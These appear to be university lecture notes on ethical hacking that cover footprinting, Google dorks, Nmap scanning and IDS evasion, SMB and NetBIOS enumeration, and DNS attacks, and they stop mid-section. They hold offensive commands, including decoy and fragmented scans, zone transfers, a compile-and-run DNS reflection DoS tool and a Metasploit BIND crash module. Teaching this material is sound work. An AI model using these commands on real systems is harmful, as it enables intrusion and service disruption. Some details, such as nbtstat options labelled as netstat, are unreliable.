Ethical Hacking

UNIT-2

Footprinting
Footprinting is the process of gathering information about a target system, network, or organization to identify security
vulnerabilities. It is the first step in ethical hacking and penetration testing.
Types of Footprinting
1. Passive Footprinting – Collecting publicly available information without direct interaction with the target.
Ex:
o WHOIS lookup
o DNS records analysis
o Social media and company websites
2. Active Footprinting – Directly engaging with the target to collect data.
Ex:
o Port scanning using Nmap
o Traceroute analysis
o Banner grabbing
Footprinting Tools
• Nmap – For scanning network ports.
• theHarvester – Gathers emails and subdomains.
• Maltego – Visualizes relationships between gathered data.

Key Objectives:
1. Identify the Target’s Infrastructure
o Gather details about IP addresses, domain names, subdomains, and network topology.
2. Collect Organizational Information
o Extract details about employees, job roles, partners, and technologies used from public sources like
websites, job postings, and social media.
3. Identify Security Weaknesses
o Discover outdated software, misconfigurations, or unpatched vulnerabilities that could be exploited.
4. Gather Network and System Information
o Obtain details about open ports, services running on servers, and operating system versions.
5. Understand Security Policies and Procedures
o Analyze the organization’s security posture, firewall rules, and access controls.
6. Assist in Penetration Testing
o Provide valuable insights for ethical hackers to simulate real-world cyber attacks and improve
defenses.

Footprinting Methodologies
1. Passive Footprinting
Collecting publicly available information without directly interacting with the target.
Ex: WHOIS lookup, analyzing job postings, and social media research.
2. Active Footprinting
Directly engaging with the target system to gather details.
Ex: Port scanning, traceroute, and banner grabbing using tools like Nmap and Netcat.
3. Search Engine Footprinting
Using search engines to discover sensitive data, hidden files, cached pages, and indexed directories.
Ex: Publically available data, Finding an exposed [Link] file.

PES University Department of CSE

Ethical Hacking

4. Google Hacking (Google Dorking)

Using advanced search operators (Google Dorks) to find login pages, exposed databases, and security
misconfigurations.
Ex: filetype:pdf site:[Link] to find all PDFs on a website.
5. DNS Footprinting
Gathering domain-related information such as subdomains, mail servers, and DNS records.
Tools: nslookup, Dig, theHarvester.
6. Network Footprinting
Identifying IP addresses, open ports, running services, and firewall detection.
Tools: Nmap, Shodan.
7. Examining HTML Source Code
Analyzing a website’s source code to extract metadata, hidden comments, and sensitive information.
Ex: Finding developer comments with credentials in HTML.
8. Examining Cookies
Inspecting cookies stored by websites to understand session management and security loopholes.
Ex: Identifying persistent authentication tokens that can be exploited.
9. Email Footprinting
Analyzing email headers to track sender details, mail servers, and IP addresses.
Tools: Email header analysis tools, MXToolbox.
10. Competitive Intelligence
Gathering business-related information through financial reports, job postings, patents, and market analysis.

Google Advanced Search Operators (Google Dorks)

Google Advanced Search Operators, also known as Google Dorks, help refine searches to find specific information
efficiently. These operators are widely used for ethical hacking, penetration testing, and OSINT (Open-Source
Intelligence).

Common Google Search Operators

Operator Description Example

site: Searches within a specific website site:[Link]
filetype: Finds specific file types (PDF, DOC, TXT, etc.) filetype:pdf site:[Link]
intitle: Searches for keywords in the title of webpages intitle:login
inurl: Searches for keywords in URLs inurl:admin
cache: Shows the cached version of a webpage cache:[Link]
related: Finds sites similar to a given URL related:[Link]
link: Finds pages that link to a specific site link:[Link]
allintext: Searches for keywords in the text of a webpage allintext:password filetype:txt
allintitle: Searches for pages where all words appear in the title allintitle:secure login
allinurl: Searches for pages where all words appear in the URL allinurl:admin login

Website Footprinting
Website footprinting is the process of gathering information about a target website, including its structure,
technologies, and vulnerabilities.

PES University Department of CSE

Ethical Hacking

Techniques of Website Footprinting

1. WHOIS Lookup
o Retrieves domain registration details like owner, registrar, and contact information.
o Tool: whois <domain> (Linux) or online WHOIS lookup tools.
2. DNS Enumeration
o Identifies subdomains, mail servers, and DNS records.
o Tools: nslookup, dig, Fierce, Sublist3r.
3. Website Crawling & Scraping
o Extracts website structure, links, and hidden directories.
o Tools: HTTrack, Scrapy, wget -r <URL>.
4. Google Dorking
o Uses advanced search queries to find sensitive information.
o Example: site:[Link] filetype:pdf (finds PDFs on a domain).
5. Checking Website Technologies
o Identifies CMS, frameworks, and plugins.
o Tools: Wappalyzer, BuiltWith, whatweb <URL>.
6. Extracting Metadata
o Finds hidden data in images, documents, and PDFs.
o Tools: ExifTool, FOCA.

➢ Wappalyzer is a web extension technology profiler that shows you what websites are built with.
➢ Netcraft site reports can be used to generate a comprehensive analysis of a target website including
hosting information and history, DNS server information and site technology among others.

Email Footprinting
Email footprinting is the process of gathering information about a target's email addresses, such as their
associated domains, mail servers, metadata, and possible vulnerabilities.

Techniques of Email Footprinting

1. WHOIS Lookup
o Retrieves domain registration details, including admin email addresses.
o Tool: whois <domain> or online WHOIS lookup services.
2. Email Header Analysis
o Extracts information such as the sender's IP address, mail server, and routing path.
o Tool: Email clients (Gmail, Outlook) or Email Header Analyzer tools.
3. Email Harvesting
o Collects email addresses from websites, forums, and social media.
o Tools: theHarvester, Maltego, [Link].
4. MX Record Lookup
o Identifies mail servers used by a domain.
o Tool: nslookup -type=MX <domain> or online MX record checkers.
5. Google Dorking for Emails
o Uses search engine queries to find exposed email addresses.
o Example: site:[Link] "contact@*".
6. Social Engineering & Phishing Analysis

PES University Department of CSE

Ethical Hacking

o Examines how email-based attacks are used to trick users.

o Tools: PhishTank, Have I Been Pwned (to check leaked emails).

DNS Footprinting
DNS footprinting is the process of gathering information about a target domain’s DNS records,
subdomains, IP addresses, and mail servers. Ethical hackers use this technique to assess security risks and
identify vulnerabilities in an organization's network.

Techniques of DNS Footprinting

1. WHOIS Lookup
o Retrieves domain registration details, including owner, registrar, and contact information.
o Tool: whois <domain> or online WHOIS lookup services.
2. DNS Zone Transfer (AXFR Attack)
o Extracts entire DNS records from a misconfigured name server.
o Tool: dig axfr @nameserver <domain>.
3. NS Lookup (Name Server Lookup)
o Identifies authoritative DNS servers for a domain.
o Tool: nslookup -type=NS <domain>.
4. MX Record Lookup (Mail Server Records)
o Finds the mail servers handling emails for a domain.
o Tool: nslookup -type=MX <domain>.
5. Subdomain Enumeration
o Identifies hidden subdomains that might expose internal services.
o Tools: Sublist3r, Amass, nslookup <[Link]>.
6. Reverse DNS Lookup
o Maps an IP address to its domain name.
o Tool: nslookup <IP> or host <IP>.
7. Google Dorking for DNS Information
o Example: site:[Link] -www (Finds subdomains).

Network Footprinting
Network footprinting is the process of gathering information about a target network, such as IP addresses,
subnets, devices, and security configurations. Ethical hackers use this technique to map the network
structure and identify vulnerabilities.

Techniques of Network Footprinting:

1. WHOIS Lookup – Retrieves domain and IP ownership details.
2. Traceroute – Traces the path of packets through the network.
3. Ping Sweep – Detects active devices on a network.
4. DNS Lookup – Finds domain-to-IP mappings.
5. Port Scanning – Identifies open ports and services.

PES University Department of CSE

Ethical Hacking

Purpose:
• Identifies network infrastructure.
• Detects security misconfigurations.
• Helps in penetration testing and reconnaissance.

Tools:
Ping
Ping is a network tool used to check if a host is reachable and measure response time using ICMP Echo
Requests.
Purpose:
• Checks if a host is online.
• Measures network latency.
• Detects packet loss.

Traceroute (tracert in Windows)

Traceroute identifies the route packets take to reach a destination and detects network delays.
Purpose:
• Maps network path and routers.
• Identifies network bottlenecks.
• Diagnoses connection issues.

Social Engineering
Social Engineering is the psychological manipulation of people to trick them into revealing confidential information,
such as passwords, financial details, or security credentials. Instead of exploiting technical vulnerabilities, attackers
exploit human behavior and trust to gain unauthorized access to systems, data, or physical locations.
It is commonly used in cybersecurity attacks, frauds, and scams, where attackers impersonate trusted entities
through emails, phone calls, or in-person interactions to deceive victims.
Ex: A hacker posing as IT support calls an employee, asking for their login credentials to "fix a system issue."

Types of Social Engineering

1. Human-Based Social Engineering
Involves direct interaction with people to trick them into revealing sensitive information. Attackers exploit human
psychology rather than technical vulnerabilities.
Techniques:
• Impersonation – The attacker pretends to be someone trustworthy (e.g., IT support, police) to gain access.
Example: A hacker poses as an employee to enter a secure office.
• Tailgating (Piggybacking) – The attacker follows an authorized person into a restricted area without
credentials. Example: A person carrying a fake delivery box enters a restricted floor.
• Pretexting – The attacker creates a fabricated scenario to extract confidential details. Example: A scammer
calls an employee, pretending to be their manager, and asks for login credentials.
• Dumpster Diving – Searching trash bins for sensitive documents like passwords, invoices, or personal
records. Example: An attacker finds an old company invoice containing financial details.

2. Computer-Based Social Engineering

Uses digital platforms to deceive users into giving up sensitive data, often by exploiting trust in technology. These
attacks can lead to financial fraud, malware infections, or identity theft.

PES University Department of CSE

Ethical Hacking

Techniques:
• Phishing – Fraudulent emails or websites mimic legitimate sources to steal credentials. Example: A user gets
an email from a "bank" asking to reset their password through a fake link.
• Spear Phishing – A targeted phishing attack customized for a specific individual or organization. Example: A
fake email from a "CEO" asks an employee to transfer funds urgently.
• Baiting – Attackers offer something tempting (like free software or USB devices) to spread malware.
Example: A hacker leaves a USB labeled “Salary Report” in an office, hoping someone plugs it in.
• Scareware – Fake virus alerts trick users into installing malicious software. Example: A pop-up claims "Your
computer is infected! Click here to remove the virus."

3. Mobile-Based Social Engineering

Targets users through mobile devices using calls, SMS, or malicious applications. Attackers exploit the fact that
mobile users often act quickly without verifying information.
Techniques:
• Vishing (Voice Phishing) – Fraudulent phone calls impersonating customer support or officials. Example: A
scammer pretends to be from "bank security" and asks for card details over the phone.
• Smishing (SMS Phishing) – Fraudulent text messages containing malicious links or fake warnings. Example:
"Your account has been blocked! Click here to reactivate," leading to a phishing site.
• Malicious Apps – Fake apps that steal personal data or track users' activities. Example: A malicious "free
VPN" app secretly records keystrokes to steal login credentials.
• One-Time Password (OTP) Theft – Attackers trick users into sharing OTPs for fraudulent transactions.
Example: A scammer calls a victim pretending to be from their bank and asks for an OTP to "verify their
identity."

Scanning
Scanning is a set of procedures for identifying live hosts, ports, and services, discovering Operating system and
architecture of target system, Identifying vulnerabilities and threats in the network. Network scanning is used to create
a profile of the target organization.
Scanning refers to collecting more information using complex and aggressive reconnaissance techniques.

Types of Scanning
1. Network Scanning – Identifying active hosts and devices on a network.
2. Port Scanning – Finding open ports and services running on a target.
3. Vulnerability Scanning – Detecting security weaknesses in systems.
4. Web Application Scanning – Finding security flaws in web apps (e.g., SQL injection, XSS).
5. Malware Scanning – Checking for malicious software or backdoors.
6. Banner Grabbing (Service & Version Scanning) → Retrieves details about services running on those open
ports.

Common Scanning Tools

• Nmap – Port and network scanning.
• Angry IP Scanner – Simple IP and port scanner.
• Nessus – Vulnerability assessment.
• Nikto – Web server scanning.
• OpenVAS – Open-source vulnerability scanner.

Scanning Methodology

PES University Department of CSE

Ethical Hacking

Ethical hackers follow a structured scanning methodology to gather information about a target system and identify
vulnerabilities. The key steps involved are:
1. Check for Live Systems
o Identifies active hosts in a network.
o Techniques: Ping Sweep, ARP Scanning
o Tool: nmap -sn <IP-Range>
2. Check for Open Ports
o Finds open ports and running services.
o Technique: TCP/UDP Port Scanning
o Tool: nmap -p 1-65535 <IP>
3. Scan Beyond IDS (Intrusion Detection System)
o Avoids detection using stealthy scanning methods.
o Techniques: SYN Scan, Fragmented Packet Scan
o Tool: nmap -sS -f <IP>
4. Perform Banner Grabbing
o Retrieves service versions and OS details.
o Techniques: Telnet, Netcat, Nmap Service Scan
o Tool: nmap -sV <IP>
5. Scan for Vulnerabilities
o Detects security flaws in systems.
o Tools: Nessus, OpenVAS, Nmap Vuln Script
o Command: nmap --script=vuln <IP>

Network Scanning
Network scanning is the process of identifying active hosts, open ports, running services, and vulnerabilities in a
network.

In general network scanning have three main objectives:

1. Scanning for live devices, OS, IPs in use.
Ex: Server at [Link]
2. Looking for Ports open/closed.
Ex: The server [Link] have TCP port 23 (Telnet) running
3. Search for vulnerabilities on services scanned.
Ex: The Telnet service is cleartext and have many vulnerabilities published

Nmap and Its Scan Types

Nmap (Network Mapper) is an open-source tool used for network scanning, security auditing, and vulnerability
assessment. It helps identify live hosts, open ports, services, OS versions, and security risks in a network.

Scan Types:
1) Stealth scan/syn scan:
The Stealth Scan, also known as a Half-open or SYN scan, is a network scanning technique employed
by Nmap.
These SYN packets are part of the TCP 3-way handshake process that's used to establish a connection.
The handshake is not completed, so the ACK packet is not sent.

• To execute a Stealth Scan using Nmap, use the command:

PES University Department of CSE

Ethical Hacking

nmap -sS <target IP> -p <port>.

2) TCP Full Connect/Scan :

The first two steps of this scanning technique (SYN and SYN/ACK) are exactly the same as with a SYN scan.
It completes the 3 way handshake.
A full connection is first established between the two machines and is then torn down with RST packets.

• The command to execute this scan is as follows-

nmap -sT <target IP>

3) UDP Scan
Sending UDP packets to target ports to determine whether they are open or closed.
UDP is connectionless.
No response from closed ports.

• The corresponding command to use this scan is as follows –

nmap -sU <target>

• We can also specify which UDP port we wish the scan to be performed on.
nmap -sU -p U:53, 123 <target>

• We can fire up both TCP and UDP scan with port specification:
nmap -sU -sS -p U:53,123 T:80,443 <target>

• To perform UDP service versioning, we can use –

nmap -sU -sV -p <Ports to be scanned> <IP Address>

4) Ping Sweep
Scanning technique used to discover live hosts within a range of IP addresses.
A successful response (ICMP Echo Reply) indicates the presence of an active host, while no response suggests
an inactive or blocked host.

• The corresponding command to do so is as follows –

nmap -sn [Link]/24 This command uses the -sn flag (ping scan).

Evasion techniques
To evade IDS, sometimes we need to change the way we scan. Some of the different ways we can use nmap to evade
detection are
a) Fragmenting packets
Fragmenting packets can help in network evasion by breaking large packets into smaller fragments.

This fragmentation technique can be used to hide malicious content or reconnaissance activities
Command: nmap -sS -f <target>

There are two techniques through which packet fragmentation can be carried out
Active - sending crafted packets to the target
Passive - sniffing network traffic for things such as TTL windows, DF flags and ToS fields

PES University Department of CSE

Ethical Hacking

b) Spoofing
Spoofing in the scanning process involves the manipulation of network packets' source addresses to hide
origin of packet.

c) Multiple Decoy IP addresses:

Nmap will send multiple packets with different IP addresses, along with your attacker's IP address. It works in
tandem with spoofing.
Command: nmap -D RND:<number> <target>

Example --> nmap -D RND:10 [Link]

d) Proxy
A proxy hides the true identity.
Proxy chains - is a technique used to enhance anonymity and security.
It involves routing network traffic through multiple proxy servers.

e) Tor
a specific type of proxy that uses multiple hops to a destination; endpoints are peer computers.

Top 9 Must-Have Ethical Hacking Skills for Beginners

1. Computer Networking Skills
2. Proficient Computer Skills
3. Cryptography Skills
4. Knowledge of Operating Systems
5. Database Management to Prevent Data Breaches
6. Scripting Skills
7. Analytical and Problem-Solving Abilities
8. Programming Language Skills
9. Social Engineering Techniques

Enumeration
Enumeration is defined as the process of extracting usernames, machine names, network resources, shares and
services from a system. In this phase, the attacker creates an active connection to the system and performs directed
queries to gain more information about the target. The gathered information is used to identify the vulnerabilities or
weak points in system security and tries to exploit in the System gaining phase.

Types of information enumerated by intruders:

• Network Resource and shares
• Users and Groups
• Routing tables
• Auditing and Service settings
• Machine names
• Applications and banners
• SNMP and DNS details

Techniques for Enumeration

PES University Department of CSE

Ethical Hacking

• Extracting user names using email ID's

• Extract information using the default password
• Brute Force Active Directory
• Extract user names using SNMP
• Extract user groups from Windows
• Extract information using DNS Zone transfer

Services and Port to Enumerate

• TCP 53: DNS Zone transfer
• TCP 135: Microsoft RPC Endpoint Mapper
• TCP 137: NetBIOS Name Service
• TCP 139: NetBIOS session Service (SMB over NetBIOS)
• TCP 445: SMB over TCP (Direct Host)
• UDP 161: SNMP
• TCP/UDP 389: LDAP
• TCP/UDP 3368: Global Catalog Service
• TCP 25: Simple Mail Transfer Protocol (SMTP)

NetBIOS Enumeration
NetBIOS is an acronym that stands for Network Basic Input Output System. It enables computer communication over
a LAN and the sharing of files and printers. TCP/IP network devices are identified using NetBIOS names (Windows).
It must be network-unique and limited to 16 characters, with 15 reserved for the device name and the 16th reserved for
identifying the type of service running or name record type.
Uses of NetBIOS Enumeration

• Discover Shared Resources – Identify shared files, folders, and printers on a Windows system.
• Enumerate User & Machine Names – Obtain usernames, workgroups, and domain details.
• Privilege Escalation – Exploit misconfigured shares to gain unauthorized access to files.
• Lateral Movement – Use NetBIOS information to navigate and compromise other systems.
• Denial of Service (DoS) Attacks – Exploit NetBIOS vulnerabilities to disrupt services.
• Brute Force & Credential Attacks – List valid user accounts and attempt brute-force logins.

NetBIOS Enumeration Tools

NetBIOS enumeration tools help scan networks for security vulnerabilities, gathering critical system details such as
OS versions, user accounts, password policies, shared resources, and more.

Popular Tools for NetBIOS Enumeration

NBTScan – Scans networks for NetBIOS name information, listing shares, MAC addresses, and open ports.
NetBIOS Enumerator – Extracts NetBIOS names, shares, and user details from a Windows system.
Enum – Retrieves usernames, shares, groups, and password policies from Windows systems.
NBTEnum – A command-line tool for scanning IP ranges and listing NetBIOS shares and sessions.
Nmap (NetBIOS Scripts) – nmap --script nbstat retrieves NetBIOS details from target machines.
SMBMap – Identifies SMB shares and their permissions, helping locate misconfigurations.
Metasploit (Auxiliary Modules) – Uses NetBIOS enumeration modules to gather target system details.

PES University Department of CSE

Ethical Hacking

Netstat:
Netstat is a utility for obtaining protocol statistics, NetBIOS name table, name cache information and current TCP/IP
connections over NBT (NetBIOS over TCP/IP), assisting in the resolution of NetBIOS name resolution issues. Name
resolution is normally performed when NetBIOS over TCP/IP is operational.

Netstat Parameters and their respective functions :

Nbtst Parameters Functions

Displays the NetBIOS name table of a remote computer, where RemoteName is the remote
-a RemoteName
computer’s NetBIOS computer name.

Displays the NetBIOS name table of a remote computer, as specified by the remote
-A IPAddress
computer’s IP address (in dotted decimal notation).

The contents of the NetBIOS name cache, as well as the table of NetBIOS names and their
-c
resolved IP addresses, are listed.

Displays the names that NetBIOS applications, such as the server and redirector, have
-n
registered locally.

-r Displays the total number of names resolved by a broadcast or WINS server.

-R Removes all #PRE entries from LMHOSTS and clears the name cache.

-RR All names are released and reregistered with the name server.

The NetBIOS sessions table is listed, with destination IP addresses converted to computer
-s
NetBIOS names.

-S Lists the current NetBIOS sessions, along with their status and IP addresses.

Displays selected statistics again, pausing for the amount of time specified in Interval
Interval
between each display.

Examples:
1. To display the NetBIOS name table of a remote computer
Netstat -a

2. To see IPv4/IPv6 Group Memberships

Netstat -g

3. To display kernel interface

Netstat -i

PES University Department of CSE

Ethical Hacking

Enumerating user accounts using PsTools:

• PsExec
• PsFile
• PsGetSid
• PsKill
• PsInfo
• PsList
• PsLoggedOn
• PsLogList
• PsPasswd
• PsShutdown

SMB Enumeration
SMB( Server Message Block protocol) is a client-server communication protocol that is used for sharing access to
files, devices, serial ports, and other resources on a network. SMB enumeration is a multipart process in which we
enumerate the host or target system for different information like Hostnames, List shares, null sessions, checking
for vulnerabilities, etc.

SMB Enumeration Stages:

• Hostname enumeration
• List Share
• Checking Null session
• List users
• Vulnerability Scanning
• Overall Scanning

SMB Enumeration for Hostname

There are plenty of tools that can enumerate Hostname, here to demonstrate we are using nmblookup and nbtscan.
Nmblookup tool makes use of queries of the NetBIOS names and maps them to their related IP addresses in a
network.
1. Nmblookup:
$ nmblookup -A <Target IP>

2. Nbtscan:
$ nbtscan <target IP>

SMB Enumeration for Share and Null Session:

In this part, we are going to enumerate shares of the host or target system. We can perform this enumeration with
many tools, for this article we are going to use smbmap, smbclient, Nmap, and Metasploit for different ways of
performing this share enumeration.

1. Smbmap: Smbmap allows the attacker to enumerate samba share drives on the IP address. It also lists drive
permissions and upload/download functionality.
$ smbmap -H <target IP>

Also, we can scan for specific user shares using the credentials by using the below command
$ smbmap -H <target IP> -u username -p password

PES University Department of CSE

Ethical Hacking

2. smbclient: It is a samba-client, and it is useful to test connectivity to windows shares.

$ smbclient -L <target IP>

3. Nmap: Nmap provides smb-enum-shares NSE script which can be used to enumerate the shares.
$ nmap --script smb-enum-shares -p 139,445 <Target IP>

4. Metasploit: In Metasploit, we are going to the smb_enumshares module that will enumerate any SMB share if
present on the server.
msf6> use auxiliary/scanner/smb/smb_enumshares
msf6> auxiliary(scanner/smb/smb_enumshares) > set rhosts <target IP>
msf6> auxiliary(scanner/smb/smb_enumshares) > set smbuser <username>
msf6> auxiliary(scanner/smb/smb_enumshares) > set smbpass <password>
msf6> auxiliary(scanner/smb/smb_enumshares) > exploit

SMB Enumeration for Vulnerability Scanning:

In this stage, we use Nmap’s script for scanning for vulnerabilities that could possibly be found on the server. We can
use various tools for this stage but here we are going to look at Nmap’s NSE script.
Nmap’s smb-vuln NSE Script:
Nmap has a wide range of scripts for different purposes, here as an example we are going to look at smb-check-vulns.
This script can scan targets for a wide range of vulnerabilities, for example:
• a -3103
• regsv-dos
• ms06 -025
$ sudo nmap --script smb-vuln* -p 139,445 <Target IP>
Example:

PES University Department of CSE

Ethical Hacking

Result here we scanned the target for the specific script, and we didn’t find any vulnerability as we can see in the
scan.

SMB Enumeration by Enum4Linux:

Enum4linux is a powerful tool that can detect and fetch data from both windows and Linux OS, also SMB hosts on
the network.
$ enum4linux -U <target IP>

DNS Enumeration
DNS Enumeration is a technique used for Reconnaissance for better understanding of surface area of the Target
systems(i.e. IP addresses).
• The process of DNS Enumeration returns various important information about the target like DNS record
types, host names, IP addresses and much more depending upon the configuration of that target system.
• To perform DNS enumeration there are various open source tools, scripts available like Nmap, DNS recon etc.
Importance and Impacts:
Importance:

PES University Department of CSE

Ethical Hacking

• It helps in discovering the various services and hosts that are running on the domain.
• It makes the target surface larger as we enumerate further.
• Furthermore, it exposes the critical information about the target.
Impact:
• The attacker can read about the system data and also can modify it.
• It can also lead to various other potential DNS attacks.
• It gives the Threat actor very critical details about the system that the attack can leverage to other attacks.

Steps of DNS Enumeration:

There are various tools to do DNS Enumeration, you are free to explore them by doing a simple web search about
DNS Enumeration tools, but here we are going to use Nmap as an example:-
Nmap:
It is a tool used to discover host and services that are currently running of a computer network. Nmap provides an
extensive Script by the name dns-nsec-enum.

Command Usage:
nmap -sSU -p 53 --script dns-nsec-enum --script-args [Link]=[Link] <target>

Countermeasures Against Enumeration

➢ Disable Unnecessary Services – Turn off NetBIOS, SMB, SNMP if not needed.
➢ Restrict Access – Use strong passwords, disable anonymous logins, limit network shares.
➢ Firewall Protection – Block ports 137, 138, 139, 445, restrict ICMP.
➢ Secure System Info – Hide OS details, restrict AD enumeration.
➢ Monitor & Audit – Use IDS/IPS, check logs, conduct security audits.

Domain Name System (DNS)

The Domain Name System (DNS) translates human-readable domain names (e.g., [Link]) into machine-
readable IP addresses (e.g., [Link]), enabling internet communication
• It enables computers to locate and communicate with each other on the internet.
• Functions as a hierarchical, distributed database.
• Queries pass through multiple levels:
o Root server
o Top-Level Domain (TLD) server
o Authoritative server (stores the specific IP address).
• Ensures seamless website access using easy-to-remember names instead of numerical IP addresses.

The Implications of Hacking DNS

DNS Hacking
DNS hacking involves exploiting vulnerabilities in the Domain Name System (DNS) to redirect traffic, intercept data,
or disrupt services.
Common DNS Attacks & Their Impacts

PES University Department of CSE

Ethical Hacking

Attack Type Description Impact

Fake DNS records redirect users to malicious

DNS Spoofing Phishing, malware infections.
sites.

Users unknowingly visit fraudulent

DNS Cache Poisoning Injects false DNS entries into cache.
sites.

DNS Hijacking Attackers take control of DNS settings. Traffic interception, credential theft.

DDoS via DNS

Exploits DNS servers to flood targets. Disrupts websites/services.
Amplification

Subdomain Takeover Unclaimed subdomains used by attackers. Data leaks, impersonation attacks.

Structure of DNS
It is very difficult to find out the IP address associated with a website because there are millions of websites and with
all those websites we should be able to generate the IP address immediately, there should not be a lot of delays for that
to happen organization of the database is very important.

Root DNS Server

• DNS Record: Domain name, IP address what is the validity? what is the time to live? and all the information
related to that domain name. These records are stored in a tree-like structure.
• Namespace: Set of possible names, flat or hierarchical. The naming system maintains a collection of bindings
of names to values – given a name, a resolution mechanism returns the corresponding value.
• Name Server: It is an implementation of the resolution mechanism.
DNS = Name service in Internet – A zone is an administrative unit, and a domain is a subtree.
Types of DNS Queries
There are basically three types of DNS Queries that occur in DNS Lookup. These are stated below.
• Recursive Query: In this query, if the resolver is unable to find the record, in that case, DNS client wants the
DNS Server will respond to the client in any way like with the requested source record or an error message.
• Iterative Query: Iterative Query is the query in which DNS Client wants the best answer possible from the
DNS Server.

PES University Department of CSE

Ethical Hacking

• Non-Recursive Query: Non-Recursive Query is the query that occurs when a DNS Resolver queries a DNS
Server for some record that has access to it because of the record that exists in its cache.

DNS Resource Records

DNS records (short for "Domain Name System records") are types of data that are stored in the DNS database and
used to specify information about a domain, such as its IP address and the servers that handle its email. There are
several different types of DNS records, including A records, MX records, CNAME records, and others, each with its
own specific purpose.

DNS Record Types

Record Type Explanation
Address of Host(A) The IP address of the host.
Address of Host (AAAA) IPv6 Address.
Canonical Name (CNAME) An Alias.
Mail Exchanger (MX) Mail Server.
Name Server (NS) Name server information for a zone.
Start of Authority (SOA) Primary name server.
Pointer (PTR) Used for reverse lookups in DNS.
Text (TXT) Store miscellaneous information.

BIND9 DNS

BIND9 (Berkeley Internet Name Domain) is the most widely used DNS server software, mainly for
Linux/Unix systems.

Key Features

Supports Authoritative & Recursive DNS

Implements DNSSEC for security
Supports IPv4 & IPv6
Configurable via [Link]

Common Uses

➢ Hosting private/public DNS servers

➢ Running caching DNS resolvers
➢ Setting up forwarding and zone transfers

Basic Commands

Install (Ubuntu) → sudo apt install bind9

Check Status → systemctl status bind9
Restart Service → systemctl restart bind9
Test DNS Query → dig @localhost [Link]

PES University Department of CSE

Ethical Hacking

Common DNS Hacking Tools

WHOIS
• WHOIS is a protocol used for querying domain name and IP address information.
• Example: whois [Link]
• Provides details such as registrar, contact information, and name servers.

Recon-ng
• Purpose: Enumerates hostnames and finds subdomains.
• Commands:
1. Open Recon-ng: recon-ng
2. Load module: modules load recon/domains-hosts/brute_hosts
3. Insert domain: db insert domains [Link]
4. Run module: run

Host
• Purpose: Provides a quick lookup compared to other tools.
• Commands:
o Find domain details: host [Link]
o Find hostname for an IP: host [Link]

Dig
• Purpose: Identifies name servers and other DNS records.
• Commands:
o Request SOA (Start of Authority): dig [Link] SOA
o Find name server’s IP: dig [Link]

Port Scanning with Nmap

• Basic Port Scan: nmap <Target IP>
• Example: nmap [Link]
• UDP Scan: sudo nmap -sU [Link]
• Scan specific UDP port: sudo nmap -sU [Link] -p 53

Using Dig for DNS Queries

• Query a specific name server:
dig @<Name Server> <Domain Name>
Example: dig @[Link] [Link].cs000

• Find subdomain IP:

dig @<Target IP> <Sub-domain address>
Example: dig @[Link] [Link].cs000

• Specifying Resource Records with Dig

Command: dig @<Name Server> <Domain Name> <Record Type>
Example: dig @[Link] pes.cs000 AAAA

• Information Leak (CHAOS Queries with Dig)

Check BIND version:

PES University Department of CSE

Ethical Hacking

dig @<Name Server> <Domain Name> chaos [Link] txt

Example: dig @[Link] pes.cs000 chaos [Link] txt
• Zone Transfer Request with Dig
Command:
dig @<Name Server> AXFR <Domain Name>
Example: dig @[Link] AXFR pes.cs000
Fierce
• Purpose: Gathers information from the target DNS server.
• Command: fierce --domain <DomainName> --dns-servers <IP Address>
DNSrecon
• Purpose: DNS Enumeration and Scanning Tool.
• Command: dnsrecon -n <IP Address> -d <Domain Name>
• Example: dnsrecon -n [Link] -d pes.cs000
DNSenum
• Purpose: Enumerates DNS information.
• Command: dnsenum --dnsserver <IP Address> <Domain Name>
• Example: dnsenum --dnsserver [Link] pes.cs000

Exploitation of Vulnerabilities

DNS Traffic Amplification

• Exploits DNS system by requesting large amounts of data from name servers.
• Attack method:
o Dig query: dig @[Link] pes.cs000 ANY
o Spoof victim's IP inside the UDP packet.
o Server sends data to victim, causing a DDoS attack.

Metasploit
• Purpose: Used for searching, viewing, and running exploits via CLI.
• Commands:
1. Start Metasploit: msfconsole
2. Search DNS Amplification scanner: search dns_amp
3. Use the module: use auxiliary/scanner/dns/dns_amp
4. Set target details:
5. set DOMAINNAME pes.cs000
6. set RHOSTS [Link]
7. Confirm settings: show options
8. Execute: run

DoS, DDoS, and DRDoS Attacks

• DoS (Denial of Service): Overwhelms a server with fake requests.
• DDoS (Distributed DoS): Multiple sources send traffic, often from botnets.
• DRDoS (Distributed Reflected DoS): Attacker forges requests with target's IP, flooding it with responses.

Carrying Out a Denial of Service Attack

• Use a DNS server that amplifies traffic significantly.

PES University Department of CSE

Ethical Hacking

• Steps:
• wget --user=student --password=student [Link]
• gcc dnsdrdos.c -o dnsdrdos
• ./dnsdrdos -f dns_servers.txt -s -d pes.cs000 -l 20
• Monitor attack using Wireshark.

Running DoS with Metasploit

• Exploit BIND9 vulnerability (TKEY Remote DoS).
• Commands:
• msfconsole
• search tkey
• use auxiliary/dos/dns/bind_tkey
• set RHOSTS [Link]
• show options
• run
• Triggers malformed DNS query to crash BIND9.

DNS Spoofing
• Manipulates DNS records to redirect users.
• Steps:
o Attacker intercepts DNS requests.
o Sends forged responses to victim.
o Requires knowledge of victim's transaction ID and UDP source port.

DNS Cache Poisoning

• Flaw: Allows incorrect data transmission.
• Exploitation:
o Attacker alters name server cache.
o Redirects queries to attacker's IP.
o Uses vulnerabilities like Bailiwicked (CVE-2008-1447).

DNS Resolver and Cache

• Resolver: Client-side component of DNS that queries and retrieves responses.
• Open Resolver: Responds to any DNS queries, making it vulnerable.
• Resolver Cache: Stores recent DNS records and follows TTL expiry.

DNS Cache Snooping

• Disables recursive lookup bit to check cache presence.
• Method:
• dig +norecurse <Domain>
• Observations:
o If response contains an IP, it's cached.
o No record results in SERVFAIL.
o Delayed query suggests cache miss.
o
DNSSEC (DNS Security Extensions)
• Enhances DNS security via authentication and data integrity.

PES University Department of CSE

Ethical Hacking

• Features:
o Reduces trust in responses, preventing forgery.
o Uses Public Key Infrastructure (PKI).
o Signs records with public keys but does not encrypt traffic.

Fuzzing
• Purpose: Identifies vulnerabilities by injecting random/malformed input.
• Method:
o Alters UDP packets to flood name servers.
o Causes unexpected behavior or service crashes.
o May expose information leaks.
• Tools:
o Metasploit
o Nmap (e.g., dns-fuzz script)

Fuzzing with Nmap

• Command:
• nmap -sU --script dns-fuzz --script-args timelimit=2h [Link] -p 53
• Observations in Wireshark: Packets are dissected as malformed.

Vulnerability Research
Vulnerability research is the systematic process of identifying, analyzing, and assessing security weaknesses in
software, hardware, networks, or protocols.

Benefits for an administrator:

1. Security trends and threats
2. Early detection of weaknesses
3. Proactive security measures
4. Post-attack recovery insights

Why do we need Vulnerability Research?

